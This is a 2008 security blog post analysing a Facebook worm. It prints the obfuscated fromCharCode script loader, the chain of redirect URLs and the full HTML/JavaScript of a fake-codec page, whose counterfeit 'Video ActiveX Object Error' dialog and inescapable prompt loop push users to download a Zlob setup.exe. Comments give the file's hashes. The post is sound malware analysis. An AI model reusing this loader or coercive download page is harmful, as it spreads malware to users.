Sunday, November 9, 2008

Facebook Worm/Hack Follow-Up...

If you haven't read the previous post on the Facebook "email hack/possible worm", read it here first.

In response to the post, my friend Rob Ragan was kind enough to spend some of his time dissecting it and provided further analysis... Here is that analysis. Thanks to Rob for this.

------------------------------{analysis}-----------

Some googling after dissecting the info below yielded this:
// Obfuscated loader from the wall post. Every argument has the form 96+N-96,
// which is simply N, so String.fromCharCode() reassembles a plain <script> tag
// pointing at the remote js.js (the decoded text is shown just below). Encoding
// the markup this way keeps the literal "script src=" out of the page source,
// presumably to defeat naive string matching; document.write() then injects the
// tag synchronously while the page is still being parsed.
document.write(String.fromCharCode(96+60-96,96+115
-96,96+99-96,96+114-96,96+105-96,96+112-96,96+116-96,96+
32-96,96+115-96,96+114-96,96+99-96,96+61-96,96+39-96,96+
104-96,96+116-96,96+116-96,96+112-96,96+58-96,96+47-96,
96+47-96,96+108-96,96+111-96,96+115-96,96+116-96,96+97-
96,96+114-96,96+116-96,96+46-96,96+105-96,96+110-96,96+
102-96,96+111-96,96+47-96,96+106-96,96+115-96,96+47-96,
96+106-96,96+115-96,96+46-96,96+106-96,96+115-96,96+39
-96,96+62-96,96+60-96,96+47-96,96+115-96,96+99-96,96+114
-96,96+105-96,96+112-96,96+116-96,96+62-96));


Writes out
{script src="http://lostart.info/js/js.js" /}

which contains
// Entire contents of the remote js.js: assigning to location navigates the
// top-level window to the next hop of the redirect chain.
location="http://off34.com/go/fb.php/"

Which then gives a 302 redirect to
http://youtube-spyvideo.com/youtube_file.html

Which has an iframe like so
{IFRAME src="http://ahdirz.com/movie1.php?id=638&n=teen" height="100%" width="100%" border="0"}
Which gives us a final destination of
http://top100clipz.com/m6/movie1.php?id=638&n=teen
and this screen shot.

Thanks to all this:
{script language="javascript" src="http://top100clipz.com/popup/pop1_2007-09-04.js?id=638"}{/script}
{script language="javascript" src="http://top100clipz.com/popup/pre_2007-09-04.js?id=638"}{/script}
{script language="jscript.encode" src="http://top100clipz.com/popup/pop2_2007-09-04.js?id=638"}{/script}

{html lang="en-EN"}
{head}
{meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /}
{title}Movie{/title}
{style}
body,td,th,tr,a,img {cursor:default;}
#mainbody {background-color:#000;}
#movie {border:1px solid #fff;}
#movie a {cursor:pointer;}
{/style}
{script}
// NOTE(review): the leading '?' is most likely a transcription artifact from the
// blog — it is not valid JavaScript and should be ignored when reading the code.
// detecting(): probes for an IE-only ActiveX control whose ProgID is assembled
// from string fragments (so the name never appears contiguously in the source).
// `new ActiveXObject` throws in any browser that lacks the control — or lacks
// ActiveX entirely — so this doubles as an "is this IE with the control" check.
// Returns true when the control instantiated, false on any failure.
?function detecting(){
try
{
var testObject = new ActiveXObject("mu"+"lti"+"me"+"di"+"aCo"+"ntro"+"ls.c"+"hl");
return true;
}
catch(e)
{
; // deliberately swallowed: any error (including ReferenceError outside IE) means "not present"
}

return false;
}

// releaseMovie(): only when the ActiveX probe succeeds, replaces the placeholder
// image in #playMov with an <embed> of a remote .mpg. The markup is a runtime
// string (angle brackets appear as braces throughout this transcription).
function releaseMovie() {
if (detecting()) {
document.getElementById('playMov').innerHTML = '{embed src="http://dwnld-clips.com/movie.mpg" width="480" height="400" autostart="true" type="movie/mpg"}{/embed}';
}
}function codecDownload()
{
// codecDownload(): the unconditional push to the payload. Browsers whose UA
// carries "SV1" (the token IE6 adds on XP SP2) or "MSIE 7" are left to the
// fake-dialog path; every other browser is navigated to the download.php URL
// after 3 s. The timer uses a string argument, which is evaluated like eval().
if (window.navigator.userAgent.indexOf("SV1") != -1 || window.navigator.userAgent.indexOf("MSIE 7") !=-1) {
return;
}
else {
window.setTimeout("location.href='http://www.cmplcoupler.com/download.php?id=638'", 3000);
}
}
{/script}
{/head}

{body id="mainbody"}{script}

// Social-engineering dialog text. Each phrase is split into concatenated
// fragments so the complete wording never appears contiguously in the source,
// presumably to defeat simple signature matching. At global script scope
// `var transcode` and `window.transcode` name the same array.
var transcode = new Array;
// [0]: text of the confirm() in tracking(); OK sends the user to the download.
window.transcode[0] = 'V'+'i'+'d'+'eo Act'+'iv'+'eX Obj'+'ect E'+'r'+'ror.\n\nY'+'o'+'ur brow'+'ser ca'+'nnot pl'+'a'+'y this vi'+'de'+'o file.\nCli'+'ck \'OK\' to dow'+'nlo'+'ad an'+'d install mis'+'sing V'+'id'+'eo Act'+'ive'+'X O'+'bj'+'ec'+'t.';
// [1]: text of the alert() shown when the user presses Cancel.
window.transcode[1] = 'Pl'+'e'+'as'+'e ins'+'ta'+'ll ne'+'w ve'+'rs'+'i'+'on of V'+'id'+'e'+'o Ac'+'ti'+'ve'+'X Ob'+'je'+'ct.';
// [2]: text of Details() and of the image's window.status hover message.
window.transcode[2] = 'Yo'+'u m'+'us'+'t do'+'wn'+'lo'+'ad V'+'id'+'eo A'+'ct'+'iv'+'eX O'+'bject t'+'o pl'+'ay th'+'is v'+'ideo f'+'ile.';

{/script}
{script}

// Runs immediately while the page is still loading: arms the 3-second redirect
// to download.php for every browser codecDownload() does not exempt.
codecDownload();

{/script}
{script}

// Generic drag-and-drop helper. NOTE(review): this looks like a copy of a widely
// circulated public drag library and is not malicious in itself — here it only
// makes the fake "Video ActiveX Object Error" dialog (#popdiv) movable, which
// helps it pass for a native OS window.
var Drag = {
// The element currently being dragged (set in start, cleared in end).
obj : null,
// Wires up `o` as the drag handle for `oRoot` (defaults to `o` itself).
// hmode/vmode: true = position via left/top, false = via right/bottom.
// min*/max*: optional pixel bounds. fXMapper/fYMapper: optional position hooks.
init : function(o, oRoot, minX, maxX, minY, maxY, bSwapHorzRef, bSwapVertRef, fXMapper, fYMapper)
{
o.onmousedown = Drag.start;

o.hmode = bSwapHorzRef ? false : true ;
o.vmode = bSwapVertRef ? false : true ;

o.root = oRoot && oRoot != null ? oRoot : o ;

// Give the positioned side an explicit 0px if it has no numeric value yet,
// so the later parseInt() calls in start/drag do not yield NaN.
if (o.hmode && isNaN(parseInt(o.root.style.left ))) o.root.style.left = "0px";
if (o.vmode && isNaN(parseInt(o.root.style.top ))) o.root.style.top = "0px";
if (!o.hmode && isNaN(parseInt(o.root.style.right ))) o.root.style.right = "0px";
if (!o.vmode && isNaN(parseInt(o.root.style.bottom))) o.root.style.bottom = "0px";

// null means "unbounded" on that side.
o.minX = typeof minX != 'undefined' ? minX : null;
o.minY = typeof minY != 'undefined' ? minY : null;
o.maxX = typeof maxX != 'undefined' ? maxX : null;
o.maxY = typeof maxY != 'undefined' ? maxY : null;

o.xMapper = fXMapper ? fXMapper : null;
o.yMapper = fYMapper ? fYMapper : null;

// No-op callbacks that a caller may overwrite; none are overwritten on this page.
o.root.onDragStart = new Function();
o.root.onDragEnd = new Function();
o.root.onDrag = new Function();
},

// mousedown handler (`this` is the handle element). Records the starting
// mouse position, converts the pixel bounds into mouse-coordinate bounds,
// and installs the document-level move/up handlers.
start : function(e)
{
var o = Drag.obj = this;
e = Drag.fixE(e);
var y = parseInt(o.vmode ? o.root.style.top : o.root.style.bottom);
var x = parseInt(o.hmode ? o.root.style.left : o.root.style.right );
o.root.onDragStart(x, y);

o.lastMouseX = e.clientX;
o.lastMouseY = e.clientY;

if (o.hmode) {
if (o.minX != null) o.minMouseX = e.clientX - x + o.minX;
if (o.maxX != null) o.maxMouseX = o.minMouseX + o.maxX - o.minX;
} else {
// right-anchored: increasing mouse X decreases the offset, so bounds swap.
if (o.minX != null) o.maxMouseX = -o.minX + e.clientX + x;
if (o.maxX != null) o.minMouseX = -o.maxX + e.clientX + x;
}

if (o.vmode) {
if (o.minY != null) o.minMouseY = e.clientY - y + o.minY;
if (o.maxY != null) o.maxMouseY = o.minMouseY + o.maxY - o.minY;
} else {
if (o.minY != null) o.maxMouseY = -o.minY + e.clientY + y;
if (o.maxY != null) o.minMouseY = -o.maxY + e.clientY + y;
}

document.onmousemove = Drag.drag;
document.onmouseup = Drag.end;

// Suppress the default mousedown action (text selection / image drag).
return false;
},

// mousemove handler: clamps the mouse to the computed bounds, applies the
// delta since the last event to the anchored side, and stores the new position.
drag : function(e)
{
e = Drag.fixE(e);
var o = Drag.obj;

var ey = e.clientY;
var ex = e.clientX;
var y = parseInt(o.vmode ? o.root.style.top : o.root.style.bottom);
var x = parseInt(o.hmode ? o.root.style.left : o.root.style.right );
var nx, ny;

if (o.minX != null) ex = o.hmode ? Math.max(ex, o.minMouseX) : Math.min(ex, o.maxMouseX);
if (o.maxX != null) ex = o.hmode ? Math.min(ex, o.maxMouseX) : Math.max(ex, o.minMouseX);
if (o.minY != null) ey = o.vmode ? Math.max(ey, o.minMouseY) : Math.min(ey, o.maxMouseY);
if (o.maxY != null) ey = o.vmode ? Math.min(ey, o.maxMouseY) : Math.max(ey, o.minMouseY);

// Sign flips when anchored to right/bottom.
nx = x + ((ex - o.lastMouseX) * (o.hmode ? 1 : -1));
ny = y + ((ey - o.lastMouseY) * (o.vmode ? 1 : -1));

// Optional mapper hooks (note the cross-axis argument); unused on this page.
if (o.xMapper) nx = o.xMapper(y)
else if (o.yMapper) ny = o.yMapper(x)

Drag.obj.root.style[o.hmode ? "left" : "right"] = nx + "px";
Drag.obj.root.style[o.vmode ? "top" : "bottom"] = ny + "px";
Drag.obj.lastMouseX = ex;
Drag.obj.lastMouseY = ey;

Drag.obj.root.onDrag(nx, ny);
return false;
},

// mouseup handler: tears down the document handlers, reports the final
// position to onDragEnd and releases the dragged element.
end : function()
{
document.onmousemove = null;
document.onmouseup = null;
Drag.obj.root.onDragEnd( parseInt(Drag.obj.root.style[Drag.obj.hmode ? "left" : "right"]),
parseInt(Drag.obj.root.style[Drag.obj.vmode ? "top" : "bottom"]));
Drag.obj = null;
},

// Normalises the event object: falls back to window.event (legacy IE) and
// fills layerX/layerY from offsetX/offsetY where the former are missing.
fixE : function(e)
{
if (typeof e == 'undefined') e = window.event;
if (typeof e.layerX == 'undefined') e.layerX = e.offsetX;
if (typeof e.layerY == 'undefined') e.layerY = e.offsetY;
return e;
}
};

// Handler for the fake dialog's "Continue" button (download="iax", no event) and
// for key presses on the dialog (download="iax", e=event). Escape (keyCode 27)
// "closes" the dialog — but Close() itself calls tracking(), so Escape still
// leads into the prompt loop. "iax" navigates straight to the payload URL.
function Downloadings(download,e)
{
if (e!=null && e.keyCode==27)
{ Close();
return;
}
switch (download)
{
case "iax": document.location.href="http://www.cmplcoupler.com/download.php?id=638"; break;
Close(); // never executed: control has already left the switch at the preceding break
}

}

// Coercive prompt loop. confirm() OK -> navigate to the payload. Cancel ->
// alert(), which always returns undefined, so BOTH branches below recurse:
// the user cannot dismiss the dialogs without accepting the download (or
// killing the browser tab). The if/else around the alert is therefore cosmetic.
function tracking() {
if (confirm(window.transcode[0])) {
location.href="http://www.cmplcoupler.com/download.php?id=638";
}
else {
if (alert(window.transcode[1])) {
tracking();
}
else {
tracking();
}
}
}

// Hides the fake dialog and then drops the user into the tracking() prompt
// loop, so "Cancel", the close icon and Escape all end up at the same place.
function Close()
{
var p=document.getElementById("popdiv");
p.style.visibility="hidden";
tracking();
}
// "Details..." button: just shows the third canned message.
function Details()
{
alert(window.transcode[2]);
}

{/script}

{div name="popdiv" id="popdiv" onKeyPress="Downloadings('iax',event);" style="visibility:hidden; z-index:1;position:absolute;top:0px;left:0px;"}
{table width="474" cellpadding="0" cellspacing="0"}
{tr}
{td height="28" width="8" style="background-image:url(/img/vista-ltc.gif);"}{/td}
{td height="28" width="458" style="background-image:url(/img/vista-bgtop.gif);"}
{table width="458" cellpadding="0" cellspacing="0"}
{tr}
{td style="font-size: 12px; font-family:Segoe UI; color: #000000; padding-top:5px; padding-left: 6px;" id="w_title"}{/td}
{script} document.getElementById('w_title').innerHTML = "V"+"ide"+"o Ac"+"tiv"+"eX Ob"+"je"+"ct Er"+"ro"+"r.";{/script}
{td width="28" style="padding-top:6px; padding-right: 2px;"}{img src="/img/vista-close.gif" width="28" height="15" border="0" onClick="Close();" style="cursor:default;" /}{/td}
{/tr}
{/table}
{td height="28" width="8" style="background-image:url(/img/vista-rtc.gif);"}{/td}
{/tr}
{tr}
{td width="8" style="background-image:url(/img/vista-bgleft.gif);"}{/td}
{td width="458" style="background-image:url(/img/vista-1x1.gif);"}
{table width="458" cellpadding="0" cellspacing="8" style="padding-top:18px; padding-bottom:18px; background-image:url(/img/vista-1x1.gif);" align="center"}
{tr}
{td width="32" style="padding-left: 18px; vertical-align: top;"}{img src="/img/vista-alert.gif" width="32" height="32" border="0" /}{/td}
{td style="font-size: 12px; font-family:Segoe UI; text-align:justify; padding-left: 4px; padding-right: 20px;" id="w_content"}
{/td}
{script} document.getElementById('w_content').innerHTML = "Your bro"+"wser ca"+"nnot dis"+"play th"+"is vi"+"deo fi"+"le. You nee"+"d to dow"+"nload new "+"vers"+"ion of Vid"+"eo Ac"+"tiveX O"+"bject to play "+"this "+"video "+"file.{"+"br}{"+"br}You need"+" to do"+"wnload new"+" vers"+"ion of Vid"+"eo Ac"+"tiveX Obje"+"ct to p"+"lay th"+"is v"+"ideo f"+"ile.";{/script}
{/tr}
{/table}
{table width="458" height="52" cellpadding="0" cellspacing="0" style="background-color: #f0f0f0;padding-right: 8px;"}
{tr}
{td}
{table align="right" cellpadding="4" cellspacing="0"}
{tr}
{td}{input type="button" value="Continue" onClick="Downloadings('iax');" style="font-size:12px; font-family:Segoe UI; height:24px; width:91px;" tabindex="1" ID="Button1" NAME="Button1"}{/td}
{td}{input type="button" value="Cancel" onClick="Close()" style="font-size:12px; font-family:Segoe UI; height:24px; width:91px;" ID="Button3" NAME="Button3"}{/td}
{td}{input type="button" value="Details..." onClick="Details()" style="font-size:12px; font-family:Segoe UI; height:24px; width:91px;" ID="Button3" NAME="Button3"}{/td}
{/tr}
{/table}
{/td}
{/tr}
{/table}
{/td}
{td width="8" style="background-image:url(/img/vista-bgright.gif);"}{/td}
{/tr}
{tr}
{td height="8" width="8" style="background-image:url(/img/vista-lbc.gif);"}{/td}
{td height="8" width="458" style="background-image:url(/img/vista-bgbottom.gif);"}{/td}
{td height="8" width="8" style="background-image:url(/img/vista-rbc.gif);"}{/td}
{/tr}
{/table}
{script}
// Browser-specific entry into the social-engineering flow. detecting() can only
// succeed in IE with the control present; everywhere else it returns false.
// Firefox: after 1 s call Close(), i.e. go straight into the tracking() loop
// (the fake dialog is never shown). Other browsers: show the fake dialog after
// 2 s. Both timers use string arguments, which are evaluated like eval().
if (navigator.userAgent.indexOf("Firefox")!=-1) {
if (detecting()) { } else {
setTimeout("Close();", 1000);
}
}
else {
if (detecting()) { } else {
setTimeout("showPopDiv();",2000);
}
}

// Centres #popdiv in the viewport and makes it visible. sFlag is hard-coded to
// "No" here, so byFlag is always false and the dialog always appears — this looks
// like a server-side template placeholder that was filled with a constant.
function showPopDiv()
{
var sFlag = "No";
var byFlag = false;
var FlagAr = sFlag.split("");

if (FlagAr[0]=="1"){byFlag = true;}
if (FlagAr[0]=="3"){byFlag = true;}


if(!byFlag) {
var p=document.getElementById("popdiv");
// wmpwidth/wmpheight are never declared, so they become implicit globals;
// top/left are assigned bare numbers with no "px" unit.
wmpwidth=document.body.clientWidth/2-181;
wmpheight=document.body.clientHeight/2-120;
p.style.top = wmpheight;
p.style.left = wmpwidth;
p.style.visibility = "visible";
p.focus();
}
}

// Makes the fake dialog draggable, with no bounds and no callbacks.
Drag.init(document.getElementById("popdiv"));
{/script}
{/div}

{table id="movie" align="center" cellpadding="0" cellspacing="0"}{tr}{td id="playMov"}{a href="http://www.cmplcoupler.com/download.php?id=638"}{img width="450" style="cursor:pointer;" onMouseOver="window.status = window.transcode[2];" height="369" border="0" alt="You must download Video ActiveX Object to play this video file." src="/img/mov.gif"/}{/a}{/td}{/tr}{/table}
{script}releaseMovie();{/script}

{/body}
{/html}
-----------------------------{/analysis}-----------

Final Word:
Wow! Thanks Rob for that analysis... Looking through all that code, redirects and misdirection, you can clearly see that the final result is an attempt to get the user to install some setup.exe file, as a "missing codec" for whatever video you are presumably being redirected to. Fascinating! If anyone has been able to grab that setup.exe file please let me know; I have not been able to get it to download properly as of this morning.

3 comments:

sil said...

ping me @ sil@{infiltrated,tormenting.net||disgraced.org} for the binary

Rafal said...

@sil: I have gotten the file (but have not had a chance to do a full analysis). The file appears to be a "downloader" class adware/malware dropper.

Have you had time or been able to do any analysis on this to determine what, if anything, its purpose is?

Anonymous said...

Hi,

Origine: sbox://www.cmplcoupler.com/download.php?id=10 [Apache/2.2.9 (Fedora)]
IP: 208.73.210.50
Country: United States (USA)
Localisation: California, Los Angeles
Sat: -118.2642;34.053
Filename: setup.exe
Size: 72 858 octets
Packer: Nullsoft PiMP Stub [Nullsoft PiMP SFX]
EP: 00003225
Section: .text
EPOffset: 00002625
Linker: 6.0
SubSystem: Win32 +GUI
MD5: 35c65df20adb21ac413739389f59a2d9
SHA1: 0ccf9388dc7e6621be0601ac0708ac1c5a9b90d5
Analysis: threatexpert.com/report.aspx?md5=35c65df20adb21ac413739389f59a2d9
VT: ~6/36

Zlob ;)
secubox.aldria.com/topic-2473.html
